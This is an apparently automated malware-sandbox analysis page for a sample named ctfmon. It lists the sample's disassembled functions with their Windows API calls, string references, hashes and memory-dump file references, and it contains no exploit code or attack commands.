Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: ErrorLastValue$AllocCurrentHeapThread
String ID:
API String ID: 2020098873-0
Opcode ID: 4d9088bc305a3a135a6a46da3cc8cf04b83fd6bff02b56f14dc8209a2a451f00
Instruction ID: e67e7c9409d6482dbb0cac13eed9dcc457f33c4e76e944be94ce0609059d711d
Opcode Fuzzy Hash: 4d9088bc305a3a135a6a46da3cc8cf04b83fd6bff02b56f14dc8209a2a451f00
Instruction Fuzzy Hash: 80F02B32B055129BC7302F71AC4E5AE3A60EF02771B50017AF842A52F0CFB88CC28A6D

Function 00428847 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

TlsFree.KERNEL32(00000000,?,?,00428D54,00000000,00000001), ref: 00428853
GlobalHandle.KERNEL32(0056B508), ref: 0042887B
GlobalUnlock.KERNEL32(00000000), ref: 00428884
GlobalFree.KERNEL32(00000000), ref: 0042888B
DeleteCriticalSection.KERNEL32(0053F0FC,?,?,00428D54,00000000,00000001), ref: 00428895

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Global$Free$CriticalDeleteHandleSectionUnlock
String ID:
API String ID: 2159622880-0
Opcode ID: 72abfe4615f1a0306001f0a3fcdde9ea638aa21f76941549bfc717915cfb7916
Instruction ID: 3d5d1d7ecfedab2d5cc22e9364798e3d77b8a9c8052dba26925915cdb0ff854d
Opcode Fuzzy Hash: 72abfe4615f1a0306001f0a3fcdde9ea638aa21f76941549bfc717915cfb7916
Instruction Fuzzy Hash: AFF09A357006209BC630AB69AC88A2F76A8AF847507C9056EF801D3261CF28DC028AA8

Function 0042527C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101stringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 00425297
lstrlenW.KERNEL32(00000000), ref: 004252E1
GlobalUnlock.KERNEL32(?), ref: 00425378

Strings

@, xrefs: 004252D5

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Global$LockUnlocklstrlen
String ID: @
API String ID: 1794151802-2766056989
Opcode ID: 19f1ada7404a33da66b8377d13e41d9c87f9e0be39e69b3cb761517a8f65d2a1
Instruction ID: 56caa2758e9c52820e3943fc16772618d0e7bec53ae05310eb2a7808f0609bc1
Opcode Fuzzy Hash: 19f1ada7404a33da66b8377d13e41d9c87f9e0be39e69b3cb761517a8f65d2a1
Instruction Fuzzy Hash: 89311A32900616EBCF14DF94D8856AFBBB4FF00354F5485AAD805AB280D3789E46CF98

Function 00427E6A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetMenuCheckMarkDimensions.USER32 ref: 00427E76
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 00427F25
LoadBitmapW.USER32(00000000,00007FE3), ref: 00427F3D

Strings

, xrefs: 00427E85

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
String ID:
API String ID: 2596413745-3916222277
Opcode ID: db58282b4df4703b6be70dacb1c37d709e8e39aa73eeb00070300ebe435444dc
Instruction ID: 3dac30640d0aaed0d39e7c8ba4964ad4c3cd7e2de72bd744148c463c93ab964f
Opcode Fuzzy Hash: db58282b4df4703b6be70dacb1c37d709e8e39aa73eeb00070300ebe435444dc
Instruction Fuzzy Hash: 0C213772F00225AFDB20CF78DC85BAE7BB8EB44314F4541A6E505EB2C2D7749A058B54

Function 00402AD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000334,00007530), ref: 00402AFA
ResetEvent.KERNEL32(00000334), ref: 00402B07
SetEvent.KERNEL32(00000334), ref: 00402B81

Strings

DW-FI, xrefs: 00402AD8

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Event$ObjectResetSingleWait
String ID: DW-FI
API String ID: 463700304-2755525259
Opcode ID: 77e71a0a3001afed1319dc65d17983fcbb58cc41980ad582d64b4abd8d7ed811
Instruction ID: aee5816b9cca93473e57ae48154deca15eed2f9060ecf18fe0870dd8285205ab
Opcode Fuzzy Hash: 77e71a0a3001afed1319dc65d17983fcbb58cc41980ad582d64b4abd8d7ed811
Instruction Fuzzy Hash: 6A110876600301AFC318DF54EC889A67BB0FB98300F40482CF51563391E778954EDBB2

Function 00412444 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 00412467
LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 0041247D
LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,00416871,?,?,?,00000000,00000001), ref: 004124B0
LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,00416871,?,?,?,00000000,00000001), ref: 00412518
WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,?,?,00000000,00000000,?,00000000,?,?,00416871,?), ref: 0041253D

Strings

qhA, xrefs: 0041245C

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID: qhA
API String ID: 352835431-109923292
Opcode ID: 6d5b90a513fa248b65a245d60c829699e2c4e82a03b465a479beee4ee89a78f2
Instruction ID: ede44e41d23e5143c76023491ad2abd4dbb5e4cc9370e92a33f97a9eab123c69
Opcode Fuzzy Hash: 6d5b90a513fa248b65a245d60c829699e2c4e82a03b465a479beee4ee89a78f2
Instruction Fuzzy Hash: CB113A32A00549EBCF228F84CE41ADEBBB6EB48750F548156F924B2160D37A8DB1DB58

Function 00426950 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(00000000,000000F0), ref: 00426961
GetClassNameW.USER32(00000000,?,0000000A), ref: 0042697C
lstrcmpiW.KERNEL32(?,combobox,?,00407730,00000000), ref: 0042698B

Strings

combobox, xrefs: 00426985

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: ClassLongNameWindowlstrcmpi
String ID: combobox
API String ID: 2054663530-2240613097
Opcode ID: b568a861b1d0005741e50548d822f09965c5ca395dea38605e49c47c066aead6
Instruction ID: 5a3d263a88e3f3d6520d42c127d3d6d56894c682c1a0552d8ed4dfe0903393cf
Opcode Fuzzy Hash: b568a861b1d0005741e50548d822f09965c5ca395dea38605e49c47c066aead6
Instruction Fuzzy Hash: 8AE06571754119BBCF11AF64DC4AE6F3B68A701341FA08222B412E51A1DA34E5968A6A

Function 0041466B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040F086), ref: 00414670
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00414680

Strings

IsProcessorFeaturePresent, xrefs: 0041467A
KERNEL32, xrefs: 0041466B

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: cba9025a4e58730a40b0ce5ae999992da777c126b06903a960d1670945a4db02
Instruction ID: e08e1aaa38df6158061f31c1e92fe184261e3872a30fdf9be053d858ffc3e291
Opcode Fuzzy Hash: cba9025a4e58730a40b0ce5ae999992da777c126b06903a960d1670945a4db02
Instruction Fuzzy Hash: 19C01270BC0302E6DA241BF02C99FAA332C0F82B8AF9502B26205E0094CE9DC086903D

Function 0040F130 Relevance: 6.5, APIs: 5, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e057c685b8e04973fb86481a5bafb9ccc88721ad8346fa567317af4b44edc4b7
Instruction ID: c53f18b298c334f67eaf08f9ae9cc2dd99c59691f0b3e42a7d6712c8fe277865
Opcode Fuzzy Hash: e057c685b8e04973fb86481a5bafb9ccc88721ad8346fa567317af4b44edc4b7
Instruction Fuzzy Hash: 24910472D01214AACF31AB69DD40ADF7A78EB55764F20023BFC14B66D1D33A5D848BAC

Function 0041388B Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,00002020,00439C00,00439C00,?,?,00413D57,00000000,00000010,00000000,00000009,00000009,?,0040E1F6,00000010,00000000), ref: 004138AC
VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,00413D57,00000000,00000010,00000000,00000009,00000009,?,0040E1F6,00000010,00000000), ref: 004138D0
VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,00413D57,00000000,00000010,00000000,00000009,00000009,?,0040E1F6,00000010,00000000), ref: 004138EA
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00413D57,00000000,00000010,00000000,00000009,00000009,?,0040E1F6,00000010,00000000,?), ref: 004139AB
HeapFree.KERNEL32(00000000,00000000,?,?,00413D57,00000000,00000010,00000000,00000009,00000009,?,0040E1F6,00000010,00000000,?,00000000), ref: 004139C2

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: AllocVirtual$FreeHeap
String ID:
API String ID: 714016831-0
Opcode ID: 0db23876d43320ec6d75b9ad4236e14d53901b6169a70531498ac103299d6751
Instruction ID: e0fbc1c5489a36fa46b370c331ae166ff60e5c5d4513b139ca63262e897aab2f
Opcode Fuzzy Hash: 0db23876d43320ec6d75b9ad4236e14d53901b6169a70531498ac103299d6751
Instruction Fuzzy Hash: F631CFB0640701ABD3308F24DC45BA6BBE4EB44756F10953AE1969B390EBB8A985CB4C

Function 00409473 Relevance: 6.2, APIs: 4, Instructions: 181COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00409478
VariantClear.OLEAUT32(?), ref: 0040952A
CoTaskMemFree.OLE32(?,?,?,00000000), ref: 004095C7
CoTaskMemFree.OLE32(?,?,?,00000000), ref: 004095D5

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: FreeTask$ClearH_prologVariant
String ID:
API String ID: 82050969-0
Opcode ID: d2642242818b26fdcc6663fd75fc7c676c46f1b02790232841b3b04f76bc45c1
Instruction ID: 7a4f58fe1ca51ad8bd86bb919bdeb9b1e6d69dac6bd0573dd5a3036f94321626
Opcode Fuzzy Hash: d2642242818b26fdcc6663fd75fc7c676c46f1b02790232841b3b04f76bc45c1
Instruction Fuzzy Hash: A9613C32600601DFCB20DFA5D9C496AB7F6BF48304754497EE146AB7A2CB39EC46CB54

Function 004097AE Relevance: 6.2, APIs: 4, Instructions: 165windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004097CC
GetDesktopWindow.USER32 ref: 004097DF
GetWindowRect.USER32(?,?), ref: 004097F2
GetWindowRect.USER32(?,?), ref: 004097FF

Part of subcall function 004242D8: MoveWindow.USER32(?,?,?,00000000,?,?,?,00409940,?,?,?,?,00000000), ref: 004242F4

Part of subcall function 00424368: ShowWindow.USER32(?,?,00409949,00000000,?,?,?,?,00000000), ref: 00424376

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Window$Rect$DesktopMoveShowVisible
String ID:
API String ID: 3835705305-0
Opcode ID: 9fe17d1fd798bb8d12ebb8ab7df9e78622e9de790cc82c01f0b05aff3212d542
Instruction ID: 8b8ab32d8fa83548fa5c41fe31c716bdd51a77ece67491eaac64cceb9160e636
Opcode Fuzzy Hash: 9fe17d1fd798bb8d12ebb8ab7df9e78622e9de790cc82c01f0b05aff3212d542
Instruction Fuzzy Hash: 17512C71A0021AEFCB04DFA9D984DAEB7B9FF89704B60446DF106E72A1C735AD01CB24

Function 00412658 Relevance: 6.1, APIs: 4, Instructions: 135fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,0053CB6B,?), ref: 0041271F

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 0beaa2698218d78696dd47d2982e71bd7d2d39d4c449e83d80399bd80f9cc640
Instruction ID: 79ff61329588fcd8c51eb6643ed27d011935784b492264ec9ea3890574dd97e0
Opcode Fuzzy Hash: 0beaa2698218d78696dd47d2982e71bd7d2d39d4c449e83d80399bd80f9cc640
Instruction Fuzzy Hash: 8E51D971900108EFCB11CF58C984BDE7BB4FF41350F2045A6E415DB2A1D774DA91CB59

Function 0041EEF0 Relevance: 6.1, APIs: 4, Instructions: 131COMMON

Download Yara Rule

APIs

GetPropA.USER32(?,?), ref: 0041EF36
CallWindowProcA.USER32(00000000), ref: 0041EF61

Part of subcall function 0041C470: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 0041C496
Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4AE
Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4BA

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID:
API String ID: 2276450057-0
Opcode ID: 3cb7a389d14d3f0a8cba7efc88d81151684dd99c2d336f3c1b205e18befae0c2
Instruction ID: 8146b5ed783db7286c47fb04c36b5b3a6faea0ea761c2a130bf3399523f472a8
Opcode Fuzzy Hash: 3cb7a389d14d3f0a8cba7efc88d81151684dd99c2d336f3c1b205e18befae0c2
Instruction Fuzzy Hash: 8C31EB7EB0420477D6209A1AFC859EFB398E78A725F540537FD0593281D32DA9CB826F

Function 0040D7D5 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(0053FD88), ref: 0040D819
InterlockedDecrement.KERNEL32(0053FD88), ref: 0040D828
InterlockedDecrement.KERNEL32(0053FD88), ref: 0040D85B
InterlockedDecrement.KERNEL32(0053FD88), ref: 0040D8F3

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: Interlocked$Decrement$Increment
String ID:
API String ID: 2574743344-0
Opcode ID: 4e5beb613688aa6a5769420d8b65ae6e065b65cce6616efb684ed729ddedf4ef
Instruction ID: 58385c7f67a3b939472f6390f75cdd142ca35eef3932e53f8a3f89b6430db689
Opcode Fuzzy Hash: 4e5beb613688aa6a5769420d8b65ae6e065b65cce6616efb684ed729ddedf4ef
Instruction Fuzzy Hash: 2E31F772D04215BFEB222BE1DC45BDB7FA49B01760F10807AF514A62D1CABC49C59B69

Function 00423AF1 Relevance: 6.1, APIs: 4, Instructions: 106windowstringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00423B6A
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001), ref: 00423B8E
SendDlgItemMessageW.USER32(?,?,0000040B,00000000,00000001), ref: 00423BAE
SendDlgItemMessageA.USER32(?,?,?,00000000,?), ref: 00423BCF

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: ItemMessageSend$ByteCharMultiWidelstrlen
String ID:
API String ID: 3573766508-0
Opcode ID: a592d27849eff0fa8447953063a19a73d30d105c969762ad8121cc897157904e
Instruction ID: de0fd43411457c5723b9be473549cbaf37af971f57f089916a64043c4807ceea
Opcode Fuzzy Hash: a592d27849eff0fa8447953063a19a73d30d105c969762ad8121cc897157904e
Instruction Fuzzy Hash: C731D674A00228AADF209F59EC449EBBFB8EB45721F904117F95196291C63C6E42CB29

Function 00417CFB Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,00000000,?,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417D2A
MultiByteToWideChar.KERNEL32(?,00000009,0040F46A,?,00000000,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417D3D
MultiByteToWideChar.KERNEL32(?,00000001,0040F46A,?,?,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417D89
CompareStringW.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,00000000,?,00414AD9,0040F5F7,00000000,?,?,0040F46A,00000000), ref: 00417DA1

Memory Dump Source

Source File: 00000003.00000002.4563185497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4563169750.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563210383.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563228138.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563244904.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4563318813.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ctfmon.jbxd

Similarity

API ID: ByteCharMultiWide$CompareString
String ID:
API String ID: 376665442-0
Opcode ID: 65ab36382bc29e86771259d41d7cca30bc31e0b2db2b04251ba98a1bf3e1983a
Instruction ID: 0d49b2e9ac122ba47de66c770f7317a9987938b808b70659a99207eb4e60ffc5
Opcode Fuzzy Hash: 65ab36382bc29e86771259d41d7cca30bc31e0b2db2b04251ba98a1bf3e1983a
Instruction Fuzzy Hash: 2121183690021EEFCF218F94DC419EEBFB5FF48750F10416AFA1462160C7369962DBA4

Function 0041CD10 Relevance: 6.1, APIs: 4, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetPropA.USER32(?,?), ref: 0041CD4D
SendMessageA.USER32(?,00001944,00000000,?), ref: 0041CD72
